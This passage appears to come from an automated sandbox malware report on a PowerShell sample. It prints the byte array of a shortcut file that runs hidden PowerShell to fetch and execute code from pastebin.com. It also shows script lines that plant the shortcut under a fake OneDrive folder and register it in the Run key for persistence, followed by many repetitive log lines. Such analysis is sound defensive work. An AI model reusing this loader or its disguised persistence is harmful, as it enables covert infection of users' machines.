(76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File SyncJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Tries to open files direct via NTFS file id
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULLJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
